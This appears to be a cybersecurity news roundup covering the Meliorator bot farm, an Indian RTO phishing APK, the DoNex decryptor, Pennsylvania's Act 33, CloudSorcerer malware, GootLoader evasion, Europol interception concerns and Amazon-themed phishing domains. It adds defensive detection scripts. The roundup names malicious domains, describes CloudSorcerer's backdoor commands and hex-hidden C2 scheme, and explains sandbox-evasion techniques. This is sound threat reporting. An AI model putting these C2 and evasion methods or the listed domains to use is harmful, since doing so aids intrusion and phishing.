The U.S. Federal Bureau of Investigation (FBI), along with the domestic Cyber National Mission Force and several international intelligence agencies, has uncovered a sophisticated Russian-backed operation that used an artificial intelligence-powered bot farm to spread disinformation on social media platforms. The agencies - which included international partners such as the Netherlands General Intelligence and Security Service and the Canadian Centre for Cyber Security - have released a joint advisory to warn social media companies about Russian state-sponsored actors employing the Meliorator software for malign influence activity in the United States and other nations. While the tool is currently focused on X (formerly Twitter), analysts believe its developers intend to expand to other platforms.

Meliorator Bot Farm Characteristics and Capabilities

[Image: Meliorator Bot Farm FBI. Agencies involved in the investigation of the Russian operation. Source: www.ic3.gov]

The Meliorator tool creates bot persona 'souls' (false identities) with varying levels of information on their profiles and relevant 'thoughts' (automated actions). The first bot archetype has complete profiles, including a profile photo, cover photo, and biographical data, while the second archetype has very little information. The third archetype appears real by generating a lot of activity and garnering followers.

[Image: Meliorator Bot Network. Source: www.ic3.gov]

The bot personas are capable of posting content similar to that of typical social media users, mirroring disinformation from existing bot personas, perpetuating specified pre-existing false narratives, and formulating messaging based on the specific archetype of the bot. To avoid detection, the creators of the Meliorator tool used various obfuscation techniques, including IP address obfuscation, bypass of dual factor authentication, and modification of browser user agent strings to appear more consistent. The bot personas also follow genuine accounts reflective of the political leanings and interests listed in their biography, making them appear more authentic to viewers.

The tool has been used by FSB services since 2022 to generate mass quantities of social media profiles that appear to be authentic. The software includes an administrator panel called "Brigadir" and a seeding tool named "Taras," which contains backend files to control the personas used to spread disinformation. These "souls" are stored in a MongoDB database for easy manipulation. Operators access Meliorator through Virtual Network Computing (VNC) hosted at dtxt.mlrtr[.]com, using the Redmine project management software.

Justice Department Seizes Associated Domains

In relation to the joint action by intelligence agencies, the U.S. Justice Department announced the seizure of two related domain names and 968 social media accounts used in malign influence operations. According to the press release, the bot farm was developed by an individual identified as Individual A, who worked as the deputy editor-in-chief at RT, a state-run Russian news organization. In early 2022, when RT leadership sought to develop alternative means for distributing information beyond traditional news broadcasts, Individual A led the development of software to create and operate a social media bot farm, capable of creating fictitious online personas on a wide scale to advance the mission of the FSB and the Russian government.

The bot farm's operators used the network to spread disinformation on various topics, including the Russia-Ukraine conflict. These included videos in which President Putin justified Russia's actions in Ukraine, and claims that certain areas of Poland, Ukraine, and Lithuania were "gifts" to those countries from the Russian forces that liberated them from Nazi control during World War II.

[Image: Meliorator Bot. Source: justice.gov]

[Image: Source: justice.gov]

The bot farm was also used to spread videos claiming that the number of foreign fighters fighting for the Ukrainian forces was significantly lower than public estimates. Deputy Attorney General Lisa Monaco stated, “Today’s action demonstrates that the Justice Department and our partners will not tolerate Russian government actors and their agents deploying AI to sow disinformation and fuel division among Americans.” “As malign actors accelerate their criminal misuse of AI, the Justice Department will respond and we will prioritize disruptive actions with our international partners and the private sector. We will not hesitate to shut down bot farms, seize illegally obtained internet domains, and take the fight to our adversaries,” she added.

The FSB’s use of U.S.-based domain names, which the software used to register the bots, violates the International Emergency Economic Powers Act. In addition, the accompanying payments for that infrastructure violate federal money laundering laws. X (formerly Twitter) voluntarily suspended the bot accounts identified in the investigation for violating its terms of service. The FBI worked with cybersecurity agencies from Canada, the Netherlands and other partners to analyze the bot farm's technology. The Justice Department has released a joint cybersecurity advisory on the intelligence agencies' research findings, allowing social media platforms and researchers to identify and prevent further use of the technology.

[Image: Source: www.ic3.gov]

The publication includes IP addresses, SSL certificates, mail server domains, and related details associated with the infrastructure of the Meliorator bot network.

WhatsApp Android Users in India Targeted by Regional Transport Office Phishing Scam

Regional Transport Office (RTO) Phishing Scam

Cyble Research and Intelligence Labs (CRIL) researchers have observed a new campaign in which threat actors claiming to be from India's Regional Transport Office (RTO) have targeted Indian WhatsApp users with phishing messages. The campaign marks a shift from earlier tactics: WhatsApp rather than SMS is now used to deliver the phishing messages, and the focus has moved from banking customers to impersonation of government agencies and utility companies.

Regional Transport Office (RTO) WhatsApp Phishing Scam

The researchers said that since the beginning of 2024, Indian citizens have been observed receiving phishing messages on WhatsApp that impersonate the Regional Transport Office (RTO), also commonly referred to as Vahan Parivahan, a governmental organization in India responsible for vehicle registration, driver licensing, and other transport-related matters.

[Image: Regional Transport Office (RTO) malware. Source: cyble.com/blog]

Targets have received various WhatsApp messages claiming that their vehicle was found to be in violation of traffic rules, with a download link to an app titled "VAHAN PARIVAHAN," supposedly intended for viewing official citations or a "challan" (a government-recognized document or receipt). These phishing messages used legitimate regional RTO logos as WhatsApp profile pictures to lend further cover and lure potential victims into downloading the attached malicious .APK file. Once installed, the app requests permissions to access SMS messages and contacts. It runs in the background, collecting device information and sending it to the attackers through a Telegram bot. The malware then starts a service that connects to a Firebase URL to retrieve lists of phone numbers and text messages. This service is used to send SMS messages from infected devices to the phone numbers listed on the Firebase server.

The researchers from Cyble had earlier noticed a remarkably similar campaign used to target the customers of major Indian banks through malicious applications purporting to represent those banks, even bearing similar names, icons and user interfaces to official banking apps. The malware in the earlier campaign was used to collect banking credentials, credit card details, personally identifiable information (PII) and email credentials from victims.

Researchers Observe Advancements in Malware Campaigns

The researchers noted that threat actors have been observed deploying advanced malware strains that do not rely on launcher activities. Examination of the manifest file from the recent campaign reveals the absence of a launcher activity, preventing an app icon from appearing on the app drawer of infected devices and making it harder for victims to identify and uninstall the malware. The RTO scam reflects broader changes among such campaigns, marked by:
  • Shift from SMS to WhatsApp for distribution of phishing messages.
  • Focus beyond banking targets to impersonation of legitimate utility bills and government schemes/authorities.
  • Use of Malware-as-a-Service (MaaS) in campaigns.
  • Additional stealthy tactics such as leaving out launcher activities to evade detection.
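The launcher-activity trick described above is something a defender can check for directly. The following is an added example, not code from the Cyble report, that scans a decoded AndroidManifest.xml for two signals the article names: no activity carrying the MAIN/LAUNCHER intent filter (so no icon in the app drawer), and requests for SMS and contacts permissions. Both manifests are constructed for the example, and the regex approach assumes well-formed, decoded XML; a production tool would use a proper (A)XML parser.

```javascript
// Added example, not code from the Cyble report: triage a decoded
// AndroidManifest.xml for an app that hides from the app drawer (no launcher
// activity) while still asking for SMS and contacts permissions.

// Constructed manifest modelled on the behaviour described in the article.
const HIDDEN_MANIFEST = `<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed.parivahan">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application android:label="VAHAN PARIVAHAN">
    <activity android:name=".MainActivity"/>
    <service android:name=".ForwardService" android:exported="false"/>
  </application>
</manifest>`;

// Constructed benign manifest: an ordinary app with a launcher activity.
const BENIGN_MANIFEST = `<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>`;

// Permissions that matter for the SMS-stealing behaviour in the article.
const RISKY_PERMISSIONS = new Set([
  'android.permission.READ_SMS',
  'android.permission.RECEIVE_SMS',
  'android.permission.SEND_SMS',
  'android.permission.READ_CONTACTS',
]);

function declaredPermissions(xml) {
  const perms = [];
  const re = /<uses-permission\b[^>]*android:name="([^"]+)"/g;
  let m;
  while ((m = re.exec(xml)) !== null) perms.push(m[1]);
  return perms;
}

function hasLauncherActivity(xml) {
  // Each <activity> element is either self-closing or has a body up to </activity>.
  const re = /<activity\b([^>]*?)(?:\/>|>([\s\S]*?)<\/activity>)/g;
  let m;
  while ((m = re.exec(xml)) !== null) {
    const body = m[2] || '';
    // A launcher activity carries an intent filter with both MAIN and LAUNCHER.
    if (body.includes('android.intent.action.MAIN') &&
        body.includes('android.intent.category.LAUNCHER')) {
      return true;
    }
  }
  return false;
}

function triage(xml) {
  const risky = declaredPermissions(xml).filter((p) => RISKY_PERMISSIONS.has(p));
  const hiddenFromDrawer = !hasLauncherActivity(xml);
  return {
    hiddenFromDrawer,
    riskyPermissions: risky,
    // Hidden apps that still want SMS and contacts access deserve a closer look.
    suspicious: hiddenFromDrawer && risky.length >= 2,
  };
}

console.log(triage(HIDDEN_MANIFEST));
console.log(triage(BENIGN_MANIFEST));
```

The absence of a launcher activity is not malicious on its own (some legitimate system or companion apps have none), which is why the verdict is tied to the permission set rather than to the missing icon alone.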
Along with sharing potential Indicators of Compromise (IOCs) and mapping the campaign to MITRE ATT&CK techniques, the researchers have listed some recommendations to protect against the campaign:
  • Download software only from legitimate official sources such as the Google Play Store or the iOS App Store.
  • Use capable antivirus and internet security tools to scan downloaded software packages across internet-connected devices (PCs, laptops, and mobile devices).
  • Use stronger passwords and multi-factor authentication where possible.
  • Use biometric security functionality such as fingerprints or facial recognition to secure devices.
  • Maintain vigilance regarding links received via SMS messages or emails.
  • Enable Google Play Protect on Android devices.
  • Be careful with permissions granted to downloaded apps.
  • Regularly update devices, operating systems, and applications.
The researchers also noted the possibility that received Unified Payments Interface (UPI) payment verification messages are stealthily forwarded to attacker-operated devices to compromise payment systems within the campaign, as observed in other attacks.

[Image: Simpl UPI Regional Transport Office. Source: cyble.com/blog]

Researchers Crack DoNex Ransomware Encryption with Flaw in Cryptographic Schema

Crack DoNex Ransomware Encryption

Researchers have discovered a critical flaw in the cryptographic schema of the DoNex ransomware and all of its variants and predecessors. Since March 2024, they have collaborated with law enforcement agencies to discreetly provide a decryptor to affected DoNex victims. The cryptographic vulnerability was publicly discussed at Recon 2024, prompting the researchers to officially disclose details of the flaw and its implications.

DoNex Ransomware Operations

Avast researchers noted that the DoNex ransomware has undergone several rebrandings after initially identifying as Muse in April 2022. Subsequent iterations of DoNex included a rebrand to a purported Fake LockBit 3.0 in November 2022, then to DarkRace in May 2023, and finally to DoNex in March 2024. Since April 2024, the researchers noted that no newer samples had been detected, and that the ransomware group's official TOR address remained inactive, suggesting that DoNex may have ceased its evolution and rebranding attempts.

DoNex ransomware employs a complex encryption process. During execution, an encryption key is generated using the CryptGenRandom function. This key initializes a ChaCha20 symmetric key, which is then used to encrypt files. After encryption, the symmetric key is encrypted with RSA-4096 and appended to the affected file. Files up to 1 MB are encrypted in full, while larger files are encrypted in segments. The ransomware's configuration, including whitelisted extensions and files and the services to terminate, is stored in an XOR-encrypted configuration file.

While the researchers have not detailed the flaw they used to enable decryption, more information on the same cryptographic vulnerability is available from the Recon 2024 talk titled "Cryptography is hard: Breaking the DoNex ransomware," given by Gijs Rijnders, a malware reverse engineer and cyber threat intelligence analyst at the Dutch National Police.

[Image: DoNex decryptor used by the Dutch National Police, different from the Avast version. Source: cfp.recon.cx]

DoNex primarily targeted victims in the US, Italy, and Belgium, using focused attacks. The researchers confirmed that all variants of the DoNex ransomware, along with its earlier versions, can be decrypted using the released DoNex decryptor.

[Image: DoNex Ransomware map (Avast). Source: decoded.avast.io]

Identifying DoNex Ransomware and Decryption

Victims of the DoNex ransomware can recognize an attack through the ransom note left by the malware. Although different variants (Fake LockBit, DarkRace and DoNex) of DoNex produce distinct ransom notes, they share a similar layout.

[Image: DoNex Ransomware Avast. Avast version of the DoNex decryptor. Source: decoded.avast.io]

The researchers have shared instructions for using their decryptor on files encrypted by DoNex ransomware:
  1. Download the provided decryptor. (The researchers recommend running the 64-bit version of the program due to its memory requirements.)
  2. Run the decryptor's executable file as an administrator. The program runs as a wizard that guides you through the decryption process.
  3. While the program lists all local drives by default, the user is asked to provide a list of locations to be decrypted.
  4. Users are then asked to provide an encrypted file (from any variant of DoNex) together with a copy of the original file from before encryption. The researchers emphasize selecting the largest possible pair of files for this step.
  5. The next step of the wizard begins the password cracking process. The researchers state that while cracking takes only a second, it requires a large amount of memory. Once this step has completed, users can proceed to decrypt all the files on their system.
  6. In the final step, users can opt to back up encrypted files, which may help in the event of failures during decryption. The researchers stated that this option is enabled by default.
  7. Users can then let the program run to decrypt all the DoNex-encrypted files on their system.
The researchers have also shared Indicators of Compromise (IOCs) for the Fake LockBit 3.0, DarkRace and DoNex variants of the ransomware.

New ‘Act 33’ Pennsylvania Law Mandates Stricter Protection for Victims Of Data Breaches

'Act 33' Pennsylvania Law data breach

A recently passed Pennsylvania law aims to bolster consumer protections in the aftermath of data breaches. Act 33 of 2024, which is set to take effect in late September of this year, mandates stricter time limits for organizations to issue data breach notices and free provision of credit monitoring to affected individuals in the event of a data breach.

Key Provisions of Act 33 Pennsylvania Law

Under the provisions of the new law, organizations must notify the Pennsylvania Attorney General's Office if a data breach is found to affect more than 500 residents of the state of Pennsylvania.

[Image: Act 33 Pennsylvania Law Data Breach. Source: www.legis.state.pa.us]

The notice is required to include the following details:
  1. The organization name and location.
  2. The date of the breach of the security of the system.
  3. A summary of the breach incident of the security of the system.
  4. An estimated total number of individuals affected by the breach of the security of the system.
  5. An estimated total number of individuals in this Commonwealth affected by the breach of the security of the system.
Along with the reporting requirements, one of the key provisions of the law is the requirement for organizations to provide free credit reports and one year of credit monitoring to all affected consumers. The law introduces a new era of protection for consumers, requiring organizations to assume all costs and fees associated with providing affected individuals with access to credit reports and credit monitoring services. This provision means that individuals from Pennsylvania will not have to pay for these services, which can provide peace of mind in the event of a data breach and add an additional layer of protection to help prevent identity theft and financial fraud. The law defines personal information as an individual's first name or first initial and last name in combination with certain sensitive data elements, such as Social Security numbers, driver's licenses, or financial account numbers. The law is an extension of the amendment act of December 22, 2005 (P.L.474, No.94), which states:
"An act providing for security of computerized data and for the notification of residents whose personal information data was or may have been disclosed due to a breach of the security of the system; and imposing penalties," further providing for definitions, for notification of the breach of the security of the system and for notification of consumer reporting agencies; and providing for credit reporting and monitoring.
The Act 33 law received unanimous support in both chambers of the state legislature, reflecting the broad recognition of the need for stronger data protection measures.

Act Comes Amidst Geisinger Medical Center Data Breach Fallout

Reports of data breach incidents across the United States have surged in recent years, with a record 3,122 incidents reported nationwide in 2023 – a 72% increase from the previous high in 2021. According to data from the Identity Theft Resource Center, these breaches affected hundreds of millions of Americans and resulted in billions of dollars in losses. The new law comes in the wake of high-profile breaches like the one at Pennsylvania's Geisinger Medical Center, which potentially exposed the personal information of approximately one million patients. A former employee has been arrested in connection with the breach. Jonathan Friesen, Geisinger's chief privacy officer, stated in response to the arrest, “Our patients’ and members’ privacy is a top priority, and we take protecting it very seriously.” He added, “We continue to work closely with the authorities on this investigation, and while I am grateful that the perpetrator was caught and is now facing federal charges, I am sorry that this happened.” Disgruntled former patients of the hospital have joined a class action lawsuit filed against Geisinger, demanding compensation. One former patient, James Wierbowski, filed a lawsuit on June 28, seeking monetary relief that could amount to more than $5 million.

CloudSorcerer APT Targets Russian Government for Stealthy Espionage

CloudSorcerer Russian Government malware

Security researchers discovered a new sophisticated cyberespionage tool targeting Russian government entities in May 2024. The tool, dubbed CloudSorcerer, abuses popular cloud services such as Microsoft Graph, Yandex Cloud and Dropbox as command and control (C2) servers for stealthy monitoring, data collection and exfiltration.

Technical Details of CloudSorcerer Campaign

Researchers from Kaspersky believe that a new APT group is behind the CloudSorcerer malware. The malware is a single Portable Executable (PE) binary written in C that adjusts its functionality depending on the process from which it is executed. Upon execution, the malware calls the GetModuleFileNameA function to determine the name of the process in which it is running and compares that name to a set of hardcoded strings identifying browsers, mspaint.exe, and msiexec.exe. The malware activates different functions depending on the identified process name:
  • In mspaint.exe: Acts as a backdoor within the program to collect data and execute code.
  • In msiexec.exe: Initiates C2 communication.
  • In browser or other detected processes: Injects shellcode into targeted processes before terminating.
The malware's backdoor module begins by collecting system information about the victim machine in a separate thread. This information includes the computer name, user name, Windows subversion information, and system uptime. All the collected data is stored in a specially created structure. Once the information gathering is complete, the data is written to the named pipe \\.\PIPE\[1428], which is connected to the C2 module process. The backdoor then executes various commands based on the instructions it receives, such as gathering drive information, collecting file and folder data, executing shell commands, manipulating files, injecting shellcode into processes, and running advanced tasks like creating processes, modifying registry keys and managing network users. Each operation is specified by a unique COMMAND_ID within the malware:

[Image: CloudSorcerer Campaign Russian Government. Source: securelist.com (Kaspersky)]

  • 0x1 – Collect information about hard drives in the system, including logical drive names, capacity, and free space.
  • 0x2 – Collect information about files and folders, such as name, size, and type.
  • 0x3 – Execute shell commands using the ShellExecuteExW API.
  • 0x4 – Copy, move, rename, or delete files.
  • 0x5 – Read data from any file.
  • 0x6 – Create and write data to any file.
  • 0x8 – Receive a shellcode from the pipe and inject it into any process by allocating memory and creating a new thread in a remote process.
  • 0x9 – Receive a PE file, create a section and map it into the remote process.
  • 0x7 – Run additional advanced functionality.
The researchers also observed the use of GitHub pages as C2 servers, with the C2 information stealthily hidden as a hex string within the author section of the profile. These profiles contained unmodified forks of legitimate public code repositories in order to appear legitimate. The same hex string was also observed hidden within the names of public photo albums hosted on the Russian album-sharing service https://my.mail[.]ru. Associated profiles on both services contained a photo of a male from a public photo bank.

[Image: CloudSorcerer malware. Source: securelist.com (Kaspersky)]

The malware picks up the hex strings from these sources and breaks them into segments that represent different instructions. The first segment of the decoded hex string indicates the cloud service the malware should use: for example, a byte value of 1 represents Microsoft Graph and a byte value of 0 represents Yandex Cloud. The segments that follow form a string used to authenticate to the various cloud APIs, as well as a subset of functions for specific interactions with the selected cloud service.
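The profile-hunting heuristic below is an added example, not Kaspersky's code. It looks for long hex runs in a profile's author text, decodes them, and applies the selector values the report gives (1 for Microsoft Graph, 0 for Yandex Cloud); the Dropbox value is not stated on the page and is reported as unknown, and treating everything after the first byte as one printable credential string is an assumption made here. The profile records and hex values are constructed placeholders, not indicators from the report.

```javascript
// Added example, not Kaspersky's code: hunt for a cloud-service selector byte
// followed by a credential-like string, hidden as hex in profile free-text.
// Selector values 0 and 1 come from the report; the rest is assumed here.
const SERVICE_BY_SELECTOR = { 0: 'Yandex Cloud', 1: 'Microsoft Graph' };

// Constructed profile records; the hex values are placeholders, not real IoCs.
const PROFILES = [
  { user: 'fork-mirror-01',
    author: '01' + Buffer.from('constructed-graph-token-0000', 'latin1').toString('hex') },
  { user: 'fork-mirror-02',
    author: '00' + Buffer.from('constructed-yandex-token-11', 'latin1').toString('hex') },
  // A commit-hash-like value in a bio: long hex, but it decodes to binary noise.
  { user: 'real-dev', author: 'Jane Doe, fixing de01' + 'ab'.repeat(18) + ' since 2019' },
  { user: 'another-dev', author: 'Just a regular profile' },
];

// Runs of at least 16 bytes of hex, bounded by non-hex characters.
function findHexBlobs(text) {
  return text.match(/\b(?:[0-9a-fA-F]{2}){16,}\b/g) || [];
}

function classifyBlob(hex) {
  const bytes = Buffer.from(hex, 'hex');
  const selector = bytes[0];
  const rest = bytes.subarray(1);
  const printable = rest.every((b) => b >= 0x20 && b <= 0x7e);
  return {
    selector,
    service: SERVICE_BY_SELECTOR[selector] || `unknown (0x${selector.toString(16)})`,
    // Only a printable remainder looks like an API token; binary noise is a likely false positive.
    credentialCandidate: printable ? rest.toString('latin1') : null,
    byteLength: bytes.length,
  };
}

function huntProfiles(profiles) {
  const hits = [];
  for (const p of profiles) {
    for (const blob of findHexBlobs(p.author)) {
      hits.push({ user: p.user, ...classifyBlob(blob) });
    }
  }
  return hits;
}

// Hits worth escalating: a known service selector and a token-like remainder.
function escalate(hits) {
  return hits.filter((h) => h.selector in SERVICE_BY_SELECTOR && h.credentialCandidate !== null);
}

console.log(escalate(huntProfiles(PROFILES)));
```

Commit hashes and other legitimate hex in bios will match the regex, which is why the escalation step requires both a known selector and a printable remainder; anything escalated still needs manual review against the published IOCs.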

Similarity to CloudWizard APT Campaign

While the researchers noted similarities in the campaign's modus operandi and tactics to the previously known CloudWizard APT group, they state that the significant differences in code and functionality between the malware used by the two groups suggest that CloudSorcerer is likely the work of a newer APT developing its own tools. The CloudSorcerer campaign represents a sophisticated operation against Russian government entities. Its use of popular cloud services such as Microsoft Graph, Yandex Cloud, and Dropbox for C2 infrastructure, along with GitHub and MyMail photo albums for initial C2 communications, demonstrates a well-organized approach to espionage. The malware’s ability to adapt its behavior dynamically depending on the infected process, along with its complex use of Windows pipes, further highlights its intricacy. The researchers have shared a list of indicators of compromise (IOCs) to help protect against deployment of the CloudSorcerer malware.

GootLoader Malware Evades Detection Through Complicated Loops and Time-Based Delays

GootLoader Evasive Techniques Time

GootLoader, a sophisticated JavaScript-based malware, has continued to confound cybersecurity experts with its unique evasion techniques. However, researchers have discovered a new method to circumvent its anti-analysis methods by debugging it as Node.js code in Visual Studio Code. The research has cast new light on the malware's inner workings and highlighted various flaws in common sandbox-based analysis methods.

Debugging GootLoader's Evasive Techniques

While it is common for malware to sleep by calling Wscript.sleep() or setTimeout(), most malware sandboxes easily detect these 'malware sleeping' methods. GootLoader instead employs time-based delays and loop iterations for more effective evasion that can trick most sandbox environments.

[Image: Debugging GootLoader Malware. Source: unit42.paloaltonetworks.com]

While Gootkit was first identified in 2014, it has undergone many changes over time. The original Gootkit malware consisted of a Windows executable, but since 2020, JavaScript-based variants named Gootkit Loader have been distributed through fake forum posts. GootLoader can be used to deliver several other types of malware, including ransomware. Despite these changes, the group has retained the same distribution tactics in 2024, with the forum posts nearly identical in content and appearance.

Researchers from Palo Alto Networks analyzed a GootLoader sample through the novel use of Node.js debugging in Visual Studio Code on a Windows host. This approach allowed step-by-step code execution and breakpoint setting, providing more insight into the malware's control flow and execution logic than typical standalone execution. The analysis revealed that the malware employs time-consuming while loops and array functions to deliberately delay the execution of its malicious code, using these self-induced sleep periods to obscure its true nature. The researchers observed an infinite loop that repeatedly assigned the same value to a variable and, upon stepping further into the code, found a function array named 'horseq7'. The code appeared to be stuck in a loop, as it took over 10 minutes for the function to reach the required counter value within the analysis environment. This function appeared to be where the actual malicious program began execution, with the researchers identifying several different counter values and their respective functions.

[Image: GootLoader malware. Source: unit42.paloaltonetworks.com]

Flaws Within Sandbox Testing in Security Environments

Sandboxing techniques are commonly employed by security researchers to identify malicious binaries and observe their behaviour and execution with the benefit of a controlled environment. These sandbox environments can face hurdles such as processing large volumes of binaries with limited resources. GootLoader's intricate evasive techniques present additional hurdles for sandbox environments, particularly those with severely limited computing resources and time-constrained analysis windows. Understanding these techniques is crucial for researchers to develop more effective detection and analysis methods, such as enhanced sandbox environments that handle time-based evasion tactics and more sophisticated static and dynamic analysis tools that can detect such circumventing functions.

Europol Faces ‘Serious Challenge for Lawful Interception’ With Mobile Roaming Networks

Europol Details Home Routing

Europol's recent paper sheds light on the formidable challenges posed by Privacy Enhancing Technologies (PET) in Home Routing systems. Home Routing allows service providers to continue serving their paying customers after they have travelled abroad. These technologies, aimed at safeguarding user privacy, inadvertently hinder law enforcement agencies (LEAs) from intercepting communications originating from foreign SIM cards. This limitation not only impedes investigations involving foreign nationals but also complicates cases where citizens use foreign SIM cards domestically. The new paper details how this technology could potentially delay or even prevent lawful access to evidence in serious criminal cases.

Europol Details Home Routing Intervention Challenges

The Europol paper states that the core issue lies in the implementation of Privacy Enhancing Technologies (PET) within Home Routing on telecommunication networks. When PET is enabled, the visited network cannot access the encryption keys used by the home network, making it impossible to retrieve unencrypted data. This creates a roadblock for LEAs, as they can no longer intercept communications from foreign SIM cards without cooperation from the home country's service provider. The inability to intercept communications from foreign SIM cards affects not only investigations of foreign nationals but also cases involving citizens using foreign SIM cards in their own country. This limitation extends beyond simple inconvenience:
  • LEAs become dependent on cooperation from service providers in the suspect's home country.
  • Domestic interception orders can't be enforced across borders.
  • European Investigation Orders, while available, can take up to 120 days – too long for urgent cases.
These challenges stem from the disparity between the European single market, which allows service providers to operate across borders while law enforcement still remains limited by national jurisdictions.

Proposed Solutions to Home Routing

To address these issues, potential solutions must balance maintaining investigatory powers with protecting secure communications and the confidentiality of criminal investigations. The solutions outlined in the paper range from disabling Privacy Enhancing Technologies (PET) in Home Routing networks to creating a new legal framework that lets domestic law enforcement agencies request the interception of a suspect's communications in the territory of another EU member state, coupled with a common interface to apply these laws and regulations across borders. The paper details these two potential approaches:
1. Legally mandating the disabling of PET in Home Routing:
  • Maintains current security levels and law enforcement capabilities
  • Allows domestic service providers to execute interception orders for foreign SIM cards
  • Technically feasible and easily implemented
  • Preserves privacy at the same level as communication via national SIM cards
2. Enabling cross-border interception requests:
  • Allows LEAs to request interception from service providers in other EU member states
  • Maintains PET for all users
  • Requires development of cross-border standards and interfaces
  • May compromise operational security by revealing persons of interest to foreign entities
The paper acknowledges that the success of these solutions will depend on the cooperation of telecommunication service providers, law enforcement agencies and national authorities. These challenges underline the critical importance of developing a solution that balances the need for European law enforcement agencies to access data with the need to protect the privacy and security of individuals within the region. Earlier, in 2019, the European Council had raised the need to address and mitigate potential challenges to law enforcement agencies from the deployment of 5G networks and services. In the paper titled 'The significance of 5G to the European Economy and the need to mitigate security risks linked to 5G', the Council stressed the need to "address and mitigate potential challenges arising from the deployment of 5G networks and services to law enforcement including e.g. lawful interception."

Cybercriminals Prepare Fake Domains Ahead of Amazon Prime Day

Amazon Prime Day Domains

As online shoppers ready themselves for the approaching Amazon Prime Day on July 16-17, 2024, a day known for unusually extensive deals and exclusive offers, cybercriminals appear ready to lure potential victims. Researchers observed an increase in new domains that incorporated the use of the Amazon brand over the last month, with the vast majority of these found to be suspicious and designed to steal sensitive information such as login credentials, payment details, and personal data from victims.

Amazon Prime Day Fake Domains

Researchers from Check Point observed the registration of over 1,230 such domains during June 2024, with 85% of these domains flagged as malicious or suspicious. These domains pose a significant threat to shoppers' personal and financial information. The researchers identified phishing activity, deceptive emails and malicious file attachments:
  • Fake domains: Newly created Amazon-impersonating domains that mimic various legitimate Amazon Mexico websites to trick users into providing sensitive information. (Image source: blog.checkpoint.com) Examples of these fake domains include amazon-onboarding[.]com, amazonmxc[.]shop, amazonindo[.]com, shopamazon2[.]com, microsoft-amazon[.]shop, amazonapp[.]nl, shopamazon3[.]com and amazon-billing[.]top.
  • Distribution of malicious phishing files over alleged payment failures: Phishing campaigns use urgent language to prompt immediate action. One such attempt claimed a payment failure for an Amazon Prime Video order, directing users to a fraudulent login page.
(Image source: blog.checkpoint.com) Some attacks distribute files with misleading names such as "Mail-AmazonReports-73074[264].pdf", containing false alerts about account suspension in order to steal payment details. The file lures victims by creating a false sense of urgency, informing them that their Amazon account has been suspended due to mismatched billing information and instructing them to update their payment details through a provided phishing link: trk[.]klclick3[.]com. The message within the file threatens account closure if the victim does not act immediately, stoking fears of account termination or loss of access to services. (Image source: blog.checkpoint.com)
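As an added example (not code from the Check Point report), here is a small heuristic triage that scores newly registered domains for Amazon brand impersonation, run over the defanged domains quoted above. The official-domain list, abuse-prone TLDs, lure words and score thresholds are assumptions chosen for illustration.

```python
"""Heuristic triage of newly registered domains for Amazon brand impersonation.

Added example. The sample domains are the defanged ones quoted in the Check
Point findings; the official-domain list, abuse-prone TLDs, lure words and
score thresholds are assumptions chosen for illustration.
"""
import re

# Assumption: a handful of official apex domains; a real allow-list is far longer.
OFFICIAL_AMAZON_DOMAINS = ("amazon.com", "amazon.com.mx", "amazon.co.uk", "amazon.de", "amazon.nl")
# Assumption: TLDs that frequently show up in lookalike registrations.
ABUSE_PRONE_TLDS = {"shop", "top", "xyz", "online", "site", "club"}
# Assumption: words that add urgency or credibility when glued to a brand.
LURE_WORDS = ("account", "app", "billing", "login", "onboarding", "prime", "shop", "support", "verify")
OTHER_BRANDS = ("microsoft", "apple", "paypal", "google")
# Catches near-miss spellings such as amaz0n, amason or amazzon.
NEAR_MISS = re.compile(r"ama[sz]{1,2}[o0]n")


def refang(domain):
    """Turn a defanged 'amazon-billing[.]top' into a plain lower-case hostname."""
    return domain.strip().lower().replace("[.]", ".").replace("(.)", ".")


def is_official(hostname):
    return any(hostname == d or hostname.endswith("." + d) for d in OFFICIAL_AMAZON_DOMAINS)


def score_domain(domain):
    """Return (score, reasons); 0 means no Amazon impersonation signal was found."""
    hostname = refang(domain)
    if is_official(hostname):
        return 0, ["official Amazon domain"]
    labels = hostname.split(".")
    tld, name = labels[-1], ".".join(labels[:-1])
    score, reasons = 0, []
    if "amazon" in name:
        score += 3
        reasons.append("brand token 'amazon' in a non-Amazon domain")
    elif NEAR_MISS.search(name):
        score += 3
        reasons.append("near-miss spelling of 'amazon'")
    else:
        return 0, ["no Amazon brand token"]
    if tld in ABUSE_PRONE_TLDS:
        score += 2
        reasons.append("abuse-prone TLD .%s" % tld)
    rest = name.replace("amazon", "")       # what surrounds the brand token
    for word in LURE_WORDS:
        if word in rest:
            score += 1
            reasons.append("lure word '%s'" % word)
    if re.search(r"amazon\d", name):        # shopamazon2, shopamazon3
        score += 1
        reasons.append("digit appended to brand token")
    for brand in OTHER_BRANDS:
        if brand in rest:                   # microsoft-amazon
            score += 1
            reasons.append("second brand '%s' combined with Amazon" % brand)
    return score, reasons


def triage(domain):
    """Bucket a domain: 'clean', 'suspicious' (score 1-4) or 'likely-malicious' (5+)."""
    score, _ = score_domain(domain)
    if score == 0:
        return "clean"
    return "likely-malicious" if score >= 5 else "suspicious"


# Constructed feed: the eight defanged examples from the report plus two official names.
SAMPLE_FEED = [
    "amazon-onboarding[.]com", "amazonmxc[.]shop", "amazonindo[.]com", "shopamazon2[.]com",
    "microsoft-amazon[.]shop", "amazonapp[.]nl", "shopamazon3[.]com", "amazon-billing[.]top",
    "www.amazon.com", "amazon.com.mx",
]


def triage_feed(domains):
    """Return [(domain, verdict, score, reasons)] sorted with the highest scores first."""
    rows = []
    for d in domains:
        score, reasons = score_domain(d)
        rows.append((d, triage(d), score, reasons))
    return sorted(rows, key=lambda r: -r[2])


if __name__ == "__main__":
    for domain, verdict, score, reasons in triage_feed(SAMPLE_FEED):
        print("%-26s %-16s %d  %s" % (domain, verdict, score, "; ".join(reasons)))
```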

Staying Safe With Online Shopping During Amazon Prime Day

